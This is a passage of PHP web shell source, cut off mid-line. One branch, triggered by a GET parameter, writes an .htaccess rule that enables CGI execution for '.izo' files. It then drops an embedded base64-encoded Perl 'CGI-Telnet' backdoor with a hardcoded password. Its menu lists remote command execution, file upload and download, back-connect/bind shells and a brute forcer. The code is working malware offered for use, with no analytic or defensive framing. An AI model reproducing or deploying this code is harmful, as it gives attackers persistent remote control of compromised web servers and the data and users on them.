  1524. elseif($_GET['666'] == 'cgi') {
  1525.  echo "<center/><br/><div class='mybox'>
  1526.  <h1>CGI-Telnet Version 1.3 </h1>
  1527.  Pass: bandungkotasampah<br>";
  1528.  
  1529.  
  1530.     mkdir('cgi2012', 0755);
  1531.     chdir('cgi2012');
  1532.         $kokdosya = ".htaccess";
  1533.         $dosya_adi = "$kokdosya";
  1534.         $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  1535.         $metin = "AddHandler cgi-script .izo";    
  1536.         fwrite ( $dosya , $metin ) ;
  1537.         fclose ($dosya);
  1538. $cgi2012 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnVzZSBNSU1FOjpCYXNlNjQ7CiRWZXJzaW9uPSAiQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMyI7CiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7CgokUGFzc3dvcmQgPSAiYmFuZHVuZ2tvdGFzYW1wYWgiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4Kc3ViIElzX1dpbigpewoJJG9zID0gJnRyaW0oJEVOVnsiU0VSVkVSX1NPRlRXQVJFIn0pOwoJaWYoJG9zID1+IG0vd2luL2kpewoJCXJldHVybiAxOwoJfQoJZWxzZXsKCQlyZXR1cm4gMDsKCX0KfQokV2luTlQgPSAmSXNfV2luKCk7CQkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYKCQkJCQkJCQkjIHlvdSdyZSBydW5uaW5nIHRoaXMgc2NyaXB0IG9uIGEgV2luZG93cyBOVAoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLgoKJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gV2luZG93cyBOVC4KCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gVW5peC4KCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkCgkJCQkJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMKCQkJCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLgoJCQkJCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMKCQkJCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQoJCQkJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlCgkJCQkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQKCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwokY29scz0gMTUwOwokcm93cz0gMjY7CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0CiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9LgojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kKIyBzY3JpcHRzLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcgojIEFyZ3VtZW50IDE6IEZvcm0gaXRlbSBuYW1lIHRvIHdoaWNoIGZvY3VzIHNob3VsZCBiZSBzZXQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCW15ICRkaXIgPSRDdXJyZW50RGlyOwoJJGRpcj1+IHMvXFwvXFxcXC9nOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+Cjx0aXRsZT5IYWNzdWdpYTwvdGl0bGU+CgokSHRtbE1ldGFIZWFkZXIKCjwvaGVhZD4KPHN0eWxlPgpib2R5ewpmb250OiAxMHB0IFZlcmRhbmE7Cn0KdHIgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICNmZjk5MDA7Cn0KdGQgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICMyQkE4RUM7CmZvbnQ6IDEwcHQgVmVyZGFuYTsKfQoKdGFibGUgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKQkFDS0dST1VORC1DT0xPUjogIzExMTsKfQoKCmlucHV0IHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOwpmb250OiAxMHB0IFZlcmRhbmE7CmNvbG9yOiAjZmY5OTAwOwp9CgppbnB1dC5zdWJtaXQgewp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47CmNvbG9yOiAjRkZGRkZGOwpib3JkZXItY29sb3I6ICMwMDk5MDA7Cn0KCmNvZGUgewpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsKQkFDS0dST1VORC1DT0xPUjogQmxhY2s7CmZvbnQ6IDEwcHQgVmVyZGFuYSBib2xkOwpjb2xvcjogd2hpbGU7Cn0KCnJ1biB7CmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOwpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsKY29sb3I6ICNGRjAwQUE7Cn0KCnRleHRhcmVhIHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7CmZvbnQ6IEZpeGVkc3lzIGJvbGQ7CmNvbG9yOiAjYWFhOwp9CkE6bGluayB7CglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lCn0KQTp2aXNpdGVkIHsKCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmhvdmVyIHsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjZmY5OTAwOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmFjdGl2ZSB7Cgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUKfQoKLmxpc3RkaXIgdHI6aG92ZXJ7CgliYWNrZ3JvdW5kOiAjNDQ0Owp9Ci5saXN0ZGlyIHRyOmhvdmVyIHRkewoJYmFja2dyb3VuZDogIzQ0NDsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmU7Cn0KLm5vdGxpbmV7CgliYWNrZ3JvdW5kOiAjMTExOwp9Ci5saW5lewoJYmFja2dyb3VuZDogIzIyMjsKfQo8L3N0eWxlPgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gY2htb2RfZm9ybShpLGZpbGUpCnsKCS8qdmFyIGFqYXg9J2FqYXhfUG9zdERhdGEoIkZvcm1QZXJtc18nK2krJyIsIiRTY3JpcHRMb2NhdGlvbiIsIlJlc3BvbnNlRGF0YSIpOyByZXR1cm4gZmFsc2U7JzsqLwoJdmFyIGFqYXg9IiI7Cglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpCnsKCXJlc3BvbnNlLmlubmVySFRNTCA9ICI8c3BhbiBvbmNsaWNrPVxcXCJjaG1vZF9mb3JtKCIgKyBpICsgIiwnIisgZmlsZSsgIicpXFxcIiA+IisgcGVybXMgKyI8L3NwYW4+PC90ZD4iOwp9CmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQp7Cgl2YXIgYWpheD0iIjsKCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOwoJdmFyIGJhY2s9InJtX3JlbmFtZV9mb3JtKCIraSsiLFxcXCIiK2ZpbGUrIlxcXCIsXFxcIiIrZisiXFxcIik7IHJldHVybiBmYWxzZTsiOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpCnsKCWlmKGY9PSdmJykKCXsKCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Y29tbWFuZCZkPSRkaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsKCX1lbHNlCgl7CgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOwoJfQp9Cjwvc2NyaXB0Pgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBjMGMwYyIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGNlbnRlcj48Y29kZT4KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+Cjx0cj4KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+CgkJPGI+PGZvbnQgc2l6ZT0iNSI+JEVkaXRQZXJzaW9uPC9mb250PjwvYj4KCTwvdGQ+CgoJPHRkPgoKCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4KCTwvdGQ+Cgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjY2MwMDAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iIzAwMDAwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4KCTwvdGQ+Cgo8L3RyPgoKPHRyPgo8dGQgY29sc3Bhbj0iMyI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVkQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1ndWkmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkdVSTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNoZWNrbG9nIj5DaGVjayBMb2c8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwKPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9IiMiPkhlbHA8L2E+Cgo8L2ZvbnQ+PC90ZD4KPC90cj4KPC90YWJsZT4KPGZvbnQgaWQ9IlJlc3BvbnNlRGF0YSIgY29sb3I9IiNmZjk5Y2MiID4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCglwcmludCA8PEVORDsKPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4KICAgIHJldHVybjsKICB9CiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsKICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsKICB0aGlzLmludGVydmFsID0gKHR5cGVvZiBpbnRlcnZhbCA9PSAidW5kZWZpbmVkIiA/IDEwMCA6IGludGVydmFsKTsKICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsKICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0OwogIHRoaXMuY3Vyc29yID0gKGN1cnNvciA/IGN1cnNvciA6ICIiKTsKICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7CiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgdGhpcy5lbGVtZW50LnR5cGluZ1RleHQgPSB0aGlzOwogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsKICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOwogIHRoaXMucnVubmluZyA9IGZhbHNlOwogIHRoaXMuaW5UYWcgPSBmYWxzZTsKICB0aGlzLnRhZ0J1ZmZlciA9ICIiOwogIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7Cn0KVHlwaW5nVGV4dC5hbGwgPSBuZXcgQXJyYXkoKTsKVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOwpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgewogIGZvcih2YXIgaSA9IDA7IGkgPCBUeXBpbmdUZXh0LmFsbC5sZW5ndGg7IGkrKykgVHlwaW5nVGV4dC5hbGxbaV0ucnVuKCk7Cn0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7CiAgaWYodGhpcy5ydW5uaW5nKSByZXR1cm47CiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuCiAgICByZXR1cm47CiAgfQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsKLy8gIHRoaXMub3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0LnJlcGxhY2UoLzwoW148XSkqPi8sICIiKTsgICAgIC8vIFN0cmlwIEhUTUwgZnJvbSB0ZXh0LgogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgewogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7CiAgICAgIHRoaXMudGFnQnVmZmVyID0gIjwiOwogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gIj4iOwogICAgICB0aGlzLmluVGFnID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1R